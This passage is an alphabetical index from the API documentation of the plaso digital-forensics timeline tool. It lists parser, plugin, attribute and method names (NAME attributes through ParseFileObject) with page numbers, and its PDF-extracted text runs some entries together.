NAME (plaso.parsers.plist_plugins.ipod.IPodPlugin at-tribute), 245

NAME (plaso.parsers.plist_plugins.launchd.LaunchdPluginattribute), 245

NAME (plaso.parsers.plist_plugins.macuser.MacUserPluginattribute), 246

NAME (plaso.parsers.plist_plugins.safari.SafariHistoryPluginattribute), 247

NAME (plaso.parsers.plist_plugins.softwareupdate.SoftwareUpdatePluginattribute), 247

NAME (plaso.parsers.plist_plugins.spotlight.SpotlightPluginattribute), 248

NAME (plaso.parsers.plist_plugins.spotlight_volume.SpotlightVolumePluginattribute), 248

NAME (plaso.parsers.plist_plugins.timemachine.TimeMachinePluginattribute), 249

NAME (plaso.parsers.pls_recall.PlsRecallParser at-tribute), 384

NAME (plaso.parsers.plugins.BasePlugin attribute), 385NAME (plaso.parsers.popcontest.PopularityContestParser

attribute), 387name (plaso.parsers.presets.ParserPreset attribute), 388NAME (plaso.parsers.recycler.WinRecycleBinParser at-

tribute), 390NAME (plaso.parsers.recycler.WinRecyclerInfo2Parser

attribute), 390NAME (plaso.parsers.safari_cookies.BinaryCookieParser

attribute), 391NAME (plaso.parsers.santa.SantaParser attribute), 395NAME (plaso.parsers.sccm.SCCMParser attribute), 396NAME (plaso.parsers.selinux.SELinuxParser attribute),

397NAME (plaso.parsers.setupapi.SetupapiLogParser at-

tribute), 398NAME (plaso.parsers.shared.shell_items.ShellItemsParser

attribute), 250NAME (plaso.parsers.skydrivelog.SkyDriveLogParser at-

tribute), 399NAME (plaso.parsers.skydrivelog.SkyDriveOldLogParser

attribute), 400NAME (plaso.parsers.sophos_av.SophosAVLogParser at-

tribute), 401NAME (plaso.parsers.spotlight_storedb.SpotlightStoreDatabaseParser

attribute), 402

NAME (plaso.parsers.sqlite.SQLiteParser attribute), 406name (plaso.parsers.sqlite_plugins.android_calls.AndroidCallEventData

attribute), 250NAME (plaso.parsers.sqlite_plugins.android_calls.AndroidCallPlugin

attribute), 251NAME (plaso.parsers.sqlite_plugins.android_sms.AndroidSMSPlugin

attribute), 252NAME (plaso.parsers.sqlite_plugins.android_webview.WebViewPlugin

attribute), 253NAME (plaso.parsers.sqlite_plugins.android_webviewcache.AndroidWebViewCachePlugin

attribute), 253NAME (plaso.parsers.sqlite_plugins.appusage.ApplicationUsagePlugin

attribute), 254NAME (plaso.parsers.sqlite_plugins.chrome_autofill.ChromeAutofillPlugin

attribute), 255NAME (plaso.parsers.sqlite_plugins.chrome_cookies.Chrome17CookiePlugin

attribute), 256NAME (plaso.parsers.sqlite_plugins.chrome_cookies.Chrome66CookiePlugin

attribute), 256NAME (plaso.parsers.sqlite_plugins.chrome_extension_activity.ChromeExtensionActivityPlugin

attribute), 258NAME (plaso.parsers.sqlite_plugins.chrome_history.GoogleChrome27HistoryPlugin

attribute), 260NAME (plaso.parsers.sqlite_plugins.chrome_history.GoogleChrome8HistoryPlugin

attribute), 260NAME (plaso.parsers.sqlite_plugins.firefox_cookies.FirefoxCookiePlugin

attribute), 261name (plaso.parsers.sqlite_plugins.firefox_downloads.FirefoxDownloadEventData

attribute), 262NAME (plaso.parsers.sqlite_plugins.firefox_downloads.FirefoxDownloadsPlugin

attribute), 263NAME (plaso.parsers.sqlite_plugins.firefox_history.FirefoxHistoryPlugin

attribute), 263NAME (plaso.parsers.sqlite_plugins.gdrive.GoogleDrivePlugin

attribute), 266NAME (plaso.parsers.sqlite_plugins.hangouts_messages.HangoutsMessagePlugin

attribute), 268NAME (plaso.parsers.sqlite_plugins.imessage.IMessagePlugin

attribute), 269NAME (plaso.parsers.sqlite_plugins.interface.SQLitePlugin

attribute), 270NAME (plaso.parsers.sqlite_plugins.kik_ios.KikIOSPlugin

attribute), 271NAME (plaso.parsers.sqlite_plugins.kodi.KodiMyVideosPlugin

attribute), 272NAME (plaso.parsers.sqlite_plugins.ls_quarantine.LsQuarantinePlugin

attribute), 273name (plaso.parsers.sqlite_plugins.mac_document_versions.MacDocumentVersionsEventData

attribute), 273NAME (plaso.parsers.sqlite_plugins.mac_document_versions.MacDocumentVersionsPlugin

attribute), 274NAME (plaso.parsers.sqlite_plugins.mac_knowledgec.MacKnowledgeCPlugin

attribute), 275NAME (plaso.parsers.sqlite_plugins.mac_notes.MacNotesPlugin

Index 561


attribute), 276NAME (plaso.parsers.sqlite_plugins.mac_notificationcenter.MacNotificationCenterPlugin

attribute), 277NAME (plaso.parsers.sqlite_plugins.mackeeper_cache.MacKeeperCachePlugin

attribute), 278NAME (plaso.parsers.sqlite_plugins.macos_tcc.MacOSTCCPlugin

attribute), 279NAME (plaso.parsers.sqlite_plugins.safari.SafariHistoryPluginSqlite

attribute), 280NAME (plaso.parsers.sqlite_plugins.skype.SkypePlugin

attribute), 282NAME (plaso.parsers.sqlite_plugins.tango_android.TangoAndroidProfilePlugin

attribute), 285NAME (plaso.parsers.sqlite_plugins.tango_android.TangoAndroidTCPlugin

attribute), 286name (plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidContactEventData

attribute), 287NAME (plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidPlugin

attribute), 287name (plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidSearchEventData

attribute), 288name (plaso.parsers.sqlite_plugins.twitter_ios.TwitterIOSContactEventData

attribute), 289NAME (plaso.parsers.sqlite_plugins.twitter_ios.TwitterIOSPlugin

attribute), 290name (plaso.parsers.sqlite_plugins.twitter_ios.TwitterIOSStatusEventData

attribute), 290NAME (plaso.parsers.sqlite_plugins.windows_timeline.WindowsTimelinePlugin

attribute), 291NAME (plaso.parsers.sqlite_plugins.zeitgeist.ZeitgeistActivityDatabasePlugin

attribute), 292NAME (plaso.parsers.symantec.SymantecParser at-

tribute), 411NAME (plaso.parsers.syslog.SyslogParser attribute), 412NAME (plaso.parsers.syslog_plugins.cron.CronSyslogPlugin

attribute), 293NAME (plaso.parsers.syslog_plugins.interface.SyslogPlugin

attribute), 294NAME (plaso.parsers.syslog_plugins.ssh.SSHSyslogPlugin

attribute), 296NAME (plaso.parsers.systemd_journal.SystemdJournalParser

attribute), 413NAME (plaso.parsers.trendmicroav.OfficeScanVirusDetectionParser

attribute), 417NAME (plaso.parsers.trendmicroav.OfficeScanWebReputationParser

attribute), 418NAME (plaso.parsers.utmp.UtmpParser attribute), 420NAME (plaso.parsers.utmpx.UtmpxParser attribute), 421NAME (plaso.parsers.vsftpd.VsftpdLogParser attribute),

422NAME (plaso.parsers.winevt.WinEvtParser attribute), 423NAME (plaso.parsers.winevtx.WinEvtxParser attribute),

424NAME (plaso.parsers.winfirewall.WinFirewallParser at-

tribute), 427NAME (plaso.parsers.winjob.WinJobParser attribute),

428NAME (plaso.parsers.winlnk.WinLnkParser attribute),

430NAME (plaso.parsers.winprefetch.WinPrefetchParser at-

tribute), 432NAME (plaso.parsers.winreg.WinRegistryParser at-

tribute), 432NAME (plaso.parsers.winreg_plugins.appcompatcache.AppCompatCacheWindowsRegistryPlugin

attribute), 297NAME (plaso.parsers.winreg_plugins.bagmru.BagMRUWindowsRegistryPlugin

attribute), 298NAME (plaso.parsers.winreg_plugins.bam.BackgroundActivityModeratorWindowsRegistryPlugin

attribute), 298NAME (plaso.parsers.winreg_plugins.ccleaner.CCleanerPlugin

attribute), 299NAME (plaso.parsers.winreg_plugins.default.DefaultPlugin

attribute), 300NAME (plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

attribute), 303NAME (plaso.parsers.winreg_plugins.lfu.BootExecutePlugin

attribute), 303NAME (plaso.parsers.winreg_plugins.lfu.BootVerificationPlugin

attribute), 304name (plaso.parsers.winreg_plugins.mountpoints.MountPoints2EventData

attribute), 305NAME (plaso.parsers.winreg_plugins.mountpoints.MountPoints2Plugin

attribute), 305NAME (plaso.parsers.winreg_plugins.mrulist.MRUListShellItemListWindowsRegistryPlugin

attribute), 306NAME (plaso.parsers.winreg_plugins.mrulist.MRUListStringWindowsRegistryPlugin

attribute), 307NAME (plaso.parsers.winreg_plugins.mrulistex.MRUListExShellItemListWindowsRegistryPlugin

attribute), 307NAME (plaso.parsers.winreg_plugins.mrulistex.MRUListExStringAndShellItemListWindowsRegistryPlugin

attribute), 308NAME (plaso.parsers.winreg_plugins.mrulistex.MRUListExStringAndShellItemWindowsRegistryPlugin

attribute), 308NAME (plaso.parsers.winreg_plugins.mrulistex.MRUListExStringWindowsRegistryPlugin

attribute), 308NAME (plaso.parsers.winreg_plugins.msie_zones.MSIEZoneSettingsPlugin

attribute), 309NAME (plaso.parsers.winreg_plugins.network_drives.NetworkDrivesPlugin

attribute), 310NAME (plaso.parsers.winreg_plugins.networks.NetworksWindowsRegistryPlugin

attribute), 310NAME (plaso.parsers.winreg_plugins.officemru.OfficeMRUPlugin

attribute), 312NAME (plaso.parsers.winreg_plugins.outlook.OutlookSearchMRUPlugin

attribute), 312NAME (plaso.parsers.winreg_plugins.programscache.ExplorerProgramsCacheWindowsRegistryPlugin

attribute), 313NAME (plaso.parsers.winreg_plugins.run.AutoRunsPlugin

562 Index


attribute), 314NAME (plaso.parsers.winreg_plugins.sam_users.SAMUsersWindowsRegistryPlugin

attribute), 315NAME (plaso.parsers.winreg_plugins.services.ServicesPlugin

attribute), 315name (plaso.parsers.winreg_plugins.services.WindowsRegistryServiceEventData

attribute), 316NAME (plaso.parsers.winreg_plugins.shutdown.ShutdownWindowsRegistryPlugin

attribute), 317NAME (plaso.parsers.winreg_plugins.task_scheduler.TaskCacheWindowsRegistryPlugin

attribute), 318NAME (plaso.parsers.winreg_plugins.terminal_server.TerminalServerClientMRUPlugin

attribute), 319NAME (plaso.parsers.winreg_plugins.terminal_server.TerminalServerClientPlugin

attribute), 319NAME (plaso.parsers.winreg_plugins.timezone.WinRegTimezonePlugin

attribute), 319NAME (plaso.parsers.winreg_plugins.typedurls.TypedURLsPlugin

attribute), 320NAME (plaso.parsers.winreg_plugins.usb.USBPlugin at-

tribute), 321NAME (plaso.parsers.winreg_plugins.usbstor.USBStorPlugin

attribute), 322NAME (plaso.parsers.winreg_plugins.userassist.UserAssistPlugin

attribute), 323NAME (plaso.parsers.winreg_plugins.windows_version.WindowsVersionPlugin

attribute), 324NAME (plaso.parsers.winreg_plugins.winlogon.WinlogonPlugin

attribute), 325NAME (plaso.parsers.winreg_plugins.winrar.WinRARHistoryPlugin

attribute), 326NAME (plaso.parsers.winrestore.RestorePointLogParser

attribute), 433NAME (plaso.parsers.xchatlog.XChatLogParser at-

tribute), 434NAME (plaso.parsers.xchatscrollback.XChatScrollbackParser

attribute), 436NAME (plaso.parsers.zsh_extended_history.ZshExtendedHistoryParser

attribute), 436name (plaso.storage.identifiers.SQLTableIdentifier at-

tribute), 478name() (plaso.multi_processing.base_process.MultiProcessBaseProcess

property), 191NamesFileEntryFilter (class in

plaso.filters.file_entry), 158NativePythonEventFormattingHelper (class

in plaso.output.rawpy), 209NativePythonOutputModule (class in

plaso.output.rawpy), 209Negate() (plaso.filters.expressions.EventExpression

method), 155network_path (plaso.parsers.winlnk.WinLnkLinkEventData

attribute), 430NetworkDriveEventData (class in

plaso.parsers.winreg_plugins.network_drives),309

NetworkDrivesPlugin (class inplaso.parsers.winreg_plugins.network_drives),310

NetworkMinerEventData (class inplaso.parsers.networkminer), 376

NetworkMinerParser (class inplaso.parsers.networkminer), 377

NetworksWindowsRegistryPlugin (class inplaso.parsers.winreg_plugins.networks), 310

new_ext (plaso.parsers.symantec.SymantecEventDataattribute), 409

NewOutputModule()(plaso.output.manager.OutputManager classmethod), 206

next (plaso.parsers.chrome_cache.CacheEntry at-tribute), 337

next_sequence_number(plaso.storage.file_interface.SerializedAttributeContainerListattribute), 469

next_state (plaso.filters.expression_parser.Token at-tribute), 154

nickname (plaso.parsers.xchatlog.XChatLogEventDataattribute), 434

nickname (plaso.parsers.xchatscrollback.XChatScrollbackEventDataattribute), 435

node_identifier (plaso.parsers.fseventsd.FseventsdEventDataattribute), 350

NoFormatterFound, 185NONE_TIMESTAMP (plaso.lib.timelib.Timestamp at-

tribute), 191NotEqualsOperator (class in plaso.filters.filters),

161NsrlsvrAnalysisArgumentsHelper (class in

plaso.cli.helpers.nsrlsvr_analysis), 71NsrlsvrAnalysisPlugin (class in

plaso.analysis.nsrlsvr), 47NsrlsvrAnalyzer (class in plaso.analysis.nsrlsvr),

48ntdomain (plaso.parsers.symantec.SymantecEventData

attribute), 409NTFSFileStatEventData (class in

plaso.parsers.ntfs), 377NTFSFileStatEventFormatter (class in

plaso.formatters.file_system), 168NTFSMFTParser (class in plaso.parsers.ntfs), 378NTFSUSNChangeEventData (class in

plaso.parsers.ntfs), 378NTFSUSNChangeEventFormatter (class in

plaso.formatters.file_system), 169NTFSUsnJrnlParser (class in plaso.parsers.ntfs),

379NullOutputModule (class in plaso.output.null), 209

Index 563


number (plaso.parsers.sqlite_plugins.android_calls.AndroidCallEventDataattribute), 250

number (plaso.parsers.sqlite_plugins.skype.SkypeSMSEventDataattribute), 283

number_of_abandoned_tasks(plaso.engine.processing_status.TasksStatusattribute), 142

number_of_analysis_reports(plaso.storage.interface.StorageWriter at-tribute), 486

number_of_args (plaso.filters.expressions.Expressionattribute), 155

number_of_attribute_containers()(plaso.storage.file_interface.SerializedAttributeContainerListproperty), 469

number_of_characters(plaso.parsers.czip_plugins.oxml.OpenXMLEventDataattribute), 223

number_of_characters_with_spaces(plaso.parsers.czip_plugins.oxml.OpenXMLEventDataattribute), 223

number_of_consumed_event_tags(plaso.engine.processing_status.ProcessStatusattribute), 136

number_of_consumed_event_tags_delta(plaso.engine.processing_status.ProcessStatusattribute), 136

number_of_consumed_events(plaso.engine.processing_status.ProcessStatusattribute), 136

number_of_consumed_events_delta(plaso.engine.processing_status.ProcessStatusattribute), 136

number_of_consumed_reports(plaso.engine.processing_status.ProcessStatusattribute), 136

number_of_consumed_reports_delta(plaso.engine.processing_status.ProcessStatusattribute), 136

number_of_consumed_sources(plaso.engine.processing_status.ProcessStatusattribute), 136

number_of_consumed_sources_delta(plaso.engine.processing_status.ProcessStatusattribute), 137

number_of_consumed_warnings(plaso.engine.processing_status.ProcessStatusattribute), 137

number_of_consumed_warnings_delta(plaso.engine.processing_status.ProcessStatusattribute), 137

number_of_duplicate_events(plaso.engine.processing_status.EventsStatusattribute), 135

number_of_event_sources(plaso.storage.interface.StorageWriter at-tribute), 487

number_of_event_tags(plaso.storage.interface.StorageWriter at-tribute), 487

number_of_events (plaso.storage.interface.StorageWriterattribute), 487

number_of_events()(plaso.multi_processing.psort.PsortEventHeapproperty), 193

number_of_events()(plaso.storage.event_heaps.EventHeap prop-erty), 466

number_of_events()(plaso.storage.event_heaps.SerializedEventHeapproperty), 467

number_of_events_from_time_slice(plaso.engine.processing_status.EventsStatusattribute), 135

number_of_executions(plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryEventDataattribute), 323

number_of_filtered_events(plaso.engine.processing_status.EventsStatusattribute), 136

NUMBER_OF_HEADER_LINES(plaso.parsers.dsv_parser.DSVParser at-tribute), 345

number_of_hits (plaso.parsers.msiecf.MSIECFURLEventDataattribute), 375

number_of_lines (plaso.parsers.czip_plugins.oxml.OpenXMLEventDataattribute), 224

number_of_macb_grouped_events(plaso.engine.processing_status.EventsStatusattribute), 136

number_of_pages (plaso.parsers.czip_plugins.oxml.OpenXMLEventDataattribute), 224

number_of_paragraphs(plaso.parsers.czip_plugins.oxml.OpenXMLEventDataattribute), 224

number_of_produced_analysis_reports(plaso.analysis.mediator.AnalysisMediatorattribute), 46

number_of_produced_event_sources()(plaso.parsers.mediator.ParserMediator prop-erty), 373

number_of_produced_event_tags(plaso.analysis.mediator.AnalysisMediatorattribute), 46

number_of_produced_event_tags(plaso.engine.processing_status.ProcessStatusattribute), 137

number_of_produced_event_tags_delta

564 Index


(plaso.engine.processing_status.ProcessStatusattribute), 137

number_of_produced_events(plaso.engine.processing_status.ProcessStatusattribute), 137

number_of_produced_events()(plaso.parsers.mediator.ParserMediatorproperty), 373

number_of_produced_events_delta(plaso.engine.processing_status.ProcessStatusattribute), 137

number_of_produced_reports(plaso.engine.processing_status.ProcessStatusattribute), 137

number_of_produced_reports_delta(plaso.engine.processing_status.ProcessStatusattribute), 137

number_of_produced_sources(plaso.engine.processing_status.ProcessStatusattribute), 137

number_of_produced_sources_delta(plaso.engine.processing_status.ProcessStatusattribute), 137

number_of_produced_warnings(plaso.engine.processing_status.ProcessStatusattribute), 137

number_of_produced_warnings()(plaso.parsers.mediator.ParserMediatorproperty), 373

number_of_produced_warnings_delta(plaso.engine.processing_status.ProcessStatusattribute), 137

number_of_queued_tasks(plaso.engine.processing_status.TasksStatusattribute), 142

number_of_tasks_pending_merge(plaso.engine.processing_status.TasksStatusattribute), 142

number_of_tasks_processing(plaso.engine.processing_status.TasksStatusattribute), 142

number_of_volumes(plaso.parsers.winprefetch.WinPrefetchExecutionEventDataattribute), 431

number_of_warnings(plaso.storage.interface.StorageWriter at-tribute), 487

number_of_words (plaso.parsers.czip_plugins.oxml.OpenXMLEventDataattribute), 224

Oobject_name (plaso.parsers.winreg_plugins.services.WindowsRegistryServiceEventData

attribute), 316OfficeMRUListWindowsRegistryEventData

(class in plaso.parsers.winreg_plugins.officemru),311

OfficeMRUPlugin (class inplaso.parsers.winreg_plugins.officemru),311

OfficeMRUWindowsRegistryEventData (classin plaso.parsers.winreg_plugins.officemru),312

OfficeScanVirusDetectionParser (class inplaso.parsers.trendmicroav), 417

OfficeScanWebReputationParser (class inplaso.parsers.trendmicroav), 417

offset (plaso.containers.events.EventData attribute),102

offset (plaso.parsers.mactime.MactimeEventData at-tribute), 365

offset (plaso.parsers.olecf_plugins.automatic_destinations.AutomaticDestinationsDestListEntryEventDataattribute), 234

offset (plaso.parsers.symantec.SymantecEventDataattribute), 409

OLECFDocumentSummaryInformation (class inplaso.parsers.olecf_plugins.summary), 237

OLECFItemEventData (class inplaso.parsers.olecf_plugins.default), 235

OLECFParser (class in plaso.parsers.olecf ), 380OLECFPlugin (class in

plaso.parsers.olecf_plugins.interface), 237OLECFPropertySetStream (class in

plaso.parsers.olecf_plugins.summary), 237OLECFSummaryInfoFormatter (class in

plaso.formatters.olecf ), 176OLECFSummaryInformation (class in

plaso.parsers.olecf_plugins.summary), 238ONE_OR_TWO_DIGITS

(plaso.parsers.text_parser.PyparsingConstantsattribute), 415

Open() (plaso.engine.plaso_queue.Queue method), 135Open() (plaso.engine.zeromq_queue.ZeroMQQueue

method), 150Open() (plaso.formatters.winevt_rc.Sqlite3DatabaseFile

method), 179Open() (plaso.formatters.winevt_rc.Sqlite3DatabaseReader

method), 180Open() (plaso.formatters.winevt_rc.WinevtResourcesSqlite3DatabaseReader

method), 180Open() (plaso.multi_processing.plaso_xmlrpc.XMLRPCClient

method), 193Open() (plaso.multi_processing.rpc.RPCClient

method), 195Open() (plaso.output.interface.OutputModule method),

201Open() (plaso.output.xlsx.XLSXOutputModule

method), 214Open() (plaso.parsers.sqlite.SQLiteDatabase method),

Index 565


405Open() (plaso.storage.fake.writer.FakeStorageWriter

method), 450Open() (plaso.storage.file_interface.StorageFileWriter

method), 476Open() (plaso.storage.interface.BaseStore method),

483Open() (plaso.storage.interface.StorageWriter method),

489Open() (plaso.storage.redis.reader.RedisStorageReader

method), 454Open() (plaso.storage.redis.redis_store.RedisStore

method), 456Open() (plaso.storage.redis.writer.RedisStorageWriter

method), 460Open() (plaso.storage.sqlite.sqlite_file.SQLiteStorageFile

method), 465OpenXMLEventData (class in

plaso.parsers.czip_plugins.oxml), 223OpenXMLPlugin (class in

plaso.parsers.czip_plugins.oxml), 224OperaGlobalHistoryEventData (class in

plaso.parsers.opera), 380OperaGlobalHistoryParser (class in

plaso.parsers.opera), 380operating_system (plaso.containers.artifacts.SystemConfigurationArtifact

attribute), 100operating_system()

(plaso.analysis.mediator.AnalysisMediatorproperty), 47

operating_system()(plaso.parsers.mediator.ParserMediatorproperty), 373

operating_system_product(plaso.containers.artifacts.SystemConfigurationArtifactattribute), 100

operating_system_version(plaso.containers.artifacts.SystemConfigurationArtifactattribute), 100

operating_systems(plaso.parsers.presets.ParserPreset attribute),388

OperatingSystemArtifact (class inplaso.containers.artifacts), 98

Operator (class in plaso.filters.filters), 161operator (plaso.filters.expressions.Expression at-

tribute), 155OperaTypedHistoryEventData (class in

plaso.parsers.opera), 381OperaTypedHistoryParser (class in

plaso.parsers.opera), 381OPTIONAL_TABLES (plaso.parsers.esedb_plugins.interface.ESEDBPlugin

attribute), 226OPTIONAL_TABLES (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheESEDBPlugin

attribute), 228OPTIONAL_TABLES (plaso.parsers.esedb_plugins.srum.SystemResourceUsageMonitorESEDBPlugin

attribute), 233OrFilter (class in plaso.filters.filters), 161origin (plaso.containers.shell_item_events.ShellItemFileEntryEventData

attribute), 114origin (plaso.containers.windows_events.WindowsDistributedLinkTrackingEventData

attribute), 119origin (plaso.containers.windows_events.WindowsVolumeEventData

attribute), 120original_filename

(plaso.parsers.esedb_plugins.file_history.FileHistoryNamespaceEventDataattribute), 225

original_filename(plaso.parsers.recycler.WinRecycleBinEventDataattribute), 390

original_url (plaso.parsers.chrome_cache.CacheEntryattribute), 337

original_url (plaso.parsers.chrome_cache.ChromeCacheEntryEventDataattribute), 338

other (plaso.parsers.sqlite_plugins.chrome_extension_activity.ChromeExtensionActivityEventDataattribute), 258

OutlookSearchMRUEventData (class inplaso.parsers.winreg_plugins.outlook), 312

OutlookSearchMRUPlugin (class inplaso.parsers.winreg_plugins.outlook), 312

output_attribute (plaso.formatters.interface.EnumerationEventFormatterHelperattribute), 171

output_attribute (plaso.formatters.interface.FlagsEventFormatterHelperattribute), 173

OutputManager (class in plaso.output.manager), 205OutputMediator (class in plaso.output.mediator),

207OutputModule (class in plaso.output.interface), 201OutputModuleOptions (class in

plaso.cli.tool_options), 93OutputModulesArgumentsHelper (class in

plaso.cli.helpers.output_modules), 72owner (plaso.parsers.cups_ipp.CupsIppEventData at-

tribute), 341owner (plaso.parsers.winreg_plugins.windows_version.WindowsRegistryInstallationEventData

attribute), 324

Ppackage (plaso.parsers.android_app_usage.AndroidAppUsageEventData

attribute), 329package (plaso.parsers.popcontest.PopularityContestEventData

attribute), 387PACKAGE (plaso.parsers.popcontest.PopularityContestParser

attribute), 387package_code (plaso.parsers.amcache.AMCacheProgramEventData

attribute), 328package_identifier

(plaso.parsers.sqlite_plugins.windows_timeline.WindowsTimelineGenericEventData

566 Index


attribute), 291package_identifier

(plaso.parsers.sqlite_plugins.windows_timeline.WindowsTimelineUserEngagedEventDataattribute), 292

packages (plaso.parsers.apt_history.APTHistoryLogEventDataattribute), 331

page_title (plaso.parsers.sqlite_plugins.chrome_extension_activity.ChromeExtensionActivityEventDataattribute), 258

page_transition_type(plaso.parsers.sqlite_plugins.chrome_history.ChromeHistoryPageVisitedEventDataattribute), 259

page_url (plaso.parsers.sqlite_plugins.chrome_extension_activity.ChromeExtensionActivityEventDataattribute), 258

pages_viewed (plaso.parsers.cookie_plugins.ganalytics.GoogleAnalyticsEventDataattribute), 218

parameters (plaso.parsers.winjob.WinJobEventDataattribute), 428

parent (plaso.filters.path_filter.PathFilterScanTreeNodeattribute), 165

parent (plaso.parsers.symantec.SymantecEventDataattribute), 409

parent_file_reference(plaso.parsers.ntfs.NTFSFileStatEventDataattribute), 378

parent_file_reference(plaso.parsers.ntfs.NTFSUSNChangeEventDataattribute), 379

parent_file_system_identifier(plaso.parsers.spotlight_storedb.SpotlightStoreMetadataItemEventDataattribute), 404

parent_id_prefix (plaso.parsers.winreg_plugins.usbstor.USBStorEventDataattribute), 322

parent_identifier(plaso.parsers.esedb_plugins.file_history.FileHistoryNamespaceEventDataattribute), 226

parent_identifier(plaso.parsers.spotlight_storedb.SpotlightStoreMetadataItemattribute), 403

Parse() (plaso.filters.expression_parser.EventFilterExpressionParsermethod), 154

Parse() (plaso.parsers.interface.FileEntryParsermethod), 356

Parse() (plaso.parsers.interface.FileObjectParsermethod), 357

ParseAccountInformation()(plaso.parsers.sqlite_plugins.skype.SkypePluginmethod), 282

ParseActivityLogUncompressedRow()(plaso.parsers.sqlite_plugins.chrome_extension_activity.ChromeExtensionActivityPluginmethod), 258

ParseApplicationResourceUsage()(plaso.parsers.esedb_plugins.srum.SystemResourceUsageMonitorESEDBPluginmethod), 233

ParseApplicationUsageRow()

(plaso.parsers.sqlite_plugins.appusage.ApplicationUsagePluginmethod), 254

ParseArguments() (plaso.cli.image_export_tool.ImageExportToolmethod), 85

ParseArguments() (plaso.cli.log2timeline_tool.Log2TimelineToolmethod), 86

ParseArguments() (plaso.cli.pinfo_tool.PinfoToolmethod), 87

ParseArguments() (plaso.cli.psort_tool.PsortToolmethod), 88

ParseArguments() (plaso.cli.psteal_tool.PstealToolmethod), 90

ParseAutofillRow()(plaso.parsers.sqlite_plugins.chrome_autofill.ChromeAutofillPluginmethod), 255

ParseBookmarkAnnotationRow()(plaso.parsers.sqlite_plugins.firefox_history.FirefoxHistoryPluginmethod), 263

ParseBookmarkFolderRow()(plaso.parsers.sqlite_plugins.firefox_history.FirefoxHistoryPluginmethod), 263

ParseBookmarkRow()(plaso.parsers.sqlite_plugins.firefox_history.FirefoxHistoryPluginmethod), 263

ParseByteStream()(plaso.parsers.shared.shell_items.ShellItemsParsermethod), 250

ParseCacheEntry()(plaso.parsers.chrome_cache.ChromeCacheDataBlockFileParsermethod), 337

ParseCall() (plaso.parsers.sqlite_plugins.skype.SkypePluginmethod), 282

ParseCallsRow() (plaso.parsers.sqlite_plugins.android_calls.AndroidCallPluginmethod), 251

ParseChat() (plaso.parsers.sqlite_plugins.skype.SkypePluginmethod), 282

ParseCloudEntryRow()(plaso.parsers.sqlite_plugins.gdrive.GoogleDrivePluginmethod), 266

ParseContactRow()(plaso.parsers.sqlite_plugins.tango_android.TangoAndroidProfilePluginmethod), 285

ParseContactRow()(plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidPluginmethod), 287

ParseContactRow()(plaso.parsers.sqlite_plugins.twitter_ios.TwitterIOSPluginmethod), 290

ParseContainersTable()(plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheESEDBPluginmethod), 228

ParseConversationRow()(plaso.parsers.sqlite_plugins.tango_android.TangoAndroidTCPluginmethod), 286

Index 567


ParseCookieRow() (plaso.parsers.sqlite_plugins.android_webview.WebViewPluginmethod), 253

ParseCookieRow() (plaso.parsers.sqlite_plugins.chrome_cookies.BaseChromeCookiePluginmethod), 256

ParseCookieRow() (plaso.parsers.sqlite_plugins.firefox_cookies.FirefoxCookiePluginmethod), 261

ParseDataStream()(plaso.engine.extractors.EventExtractormethod), 126

ParseDestList() (plaso.parsers.olecf_plugins.automatic_destinations.AutomaticDestinationsOLECFPluginmethod), 235

ParseDownloadsRow()(plaso.parsers.sqlite_plugins.firefox_downloads.FirefoxDownloadsPluginmethod), 263

ParseError, 185ParseFileDownloadedRow()

(plaso.parsers.sqlite_plugins.chrome_history.GoogleChrome27HistoryPluginmethod), 260

ParseFileDownloadedRow()(plaso.parsers.sqlite_plugins.chrome_history.GoogleChrome8HistoryPluginmethod), 260

ParseFileEntry() (plaso.parsers.chrome_cache.ChromeCacheParsermethod), 338

ParseFileEntry() (plaso.parsers.filestat.FileStatParsermethod), 348

ParseFileEntry() (plaso.parsers.interface.FileEntryParsermethod), 356

ParseFileEntry() (plaso.parsers.sqlite.SQLiteParsermethod), 406

ParseFileEntryMetadata()(plaso.engine.extractors.EventExtractormethod), 126

ParseFileLNKFile()(plaso.parsers.winlnk.WinLnkParser method),430

ParseFileObject()(plaso.parsers.amcache.AMCacheParsermethod), 327

ParseFileObject()(plaso.parsers.android_app_usage.AndroidAppUsageParsermethod), 329

ParseFileObject() (plaso.parsers.asl.ASLParsermethod), 333

ParseFileObject()(plaso.parsers.bencode_parser.BencodeParsermethod), 335

ParseFileObject() (plaso.parsers.bsm.BSMParsermethod), 336

ParseFileObject()(plaso.parsers.chrome_cache.ChromeCacheDataBlockFileParsermethod), 337

ParseFileObject()(plaso.parsers.chrome_cache.ChromeCacheIndexFileParsermethod), 338

ParseFileObject()(plaso.parsers.chrome_preferences.ChromePreferencesParsermethod), 340

ParseFileObject()(plaso.parsers.cups_ipp.CupsIppParsermethod), 341

ParseFileObject()(plaso.parsers.custom_destinations.CustomDestinationsParsermethod), 342

ParseFileObject()(plaso.parsers.czip.CompoundZIPParsermethod), 342

ParseFileObject()(plaso.parsers.docker.DockerJSONParsermethod), 343

ParseFileObject()(plaso.parsers.dsv_parser.DSVParser method),345

ParseFileObject()(plaso.parsers.dtfabric_parser.DtFabricBaseParsermethod), 347

ParseFileObject()(plaso.parsers.esedb.ESEDBParser method),347

ParseFileObject()(plaso.parsers.firefox_cache.FirefoxCache2Parsermethod), 349

ParseFileObject()(plaso.parsers.firefox_cache.FirefoxCacheParsermethod), 350

ParseFileObject()(plaso.parsers.fseventsd.FseventsdParsermethod), 351

ParseFileObject()(plaso.parsers.interface.FileObjectParsermethod), 357

ParseFileObject()(plaso.parsers.java_idx.JavaIDXParsermethod), 358

ParseFileObject()(plaso.parsers.mac_keychain.KeychainParsermethod), 361

ParseFileObject()(plaso.parsers.msiecf.MSIECFParser method),375

ParseFileObject()(plaso.parsers.ntfs.NTFSMFTParser method),378

ParseFileObject()(plaso.parsers.ntfs.NTFSUsnJrnlParsermethod), 379

ParseFileObject()(plaso.parsers.olecf.OLECFParser method),380

568 Index


ParseFileObject()(plaso.parsers.opera.OperaGlobalHistoryParsermethod), 381

ParseFileObject()(plaso.parsers.opera.OperaTypedHistoryParsermethod), 381

ParseFileObject() (plaso.parsers.pe.PEParsermethod), 382

ParseFileObject() (plaso.parsers.plist.PlistParsermethod), 383

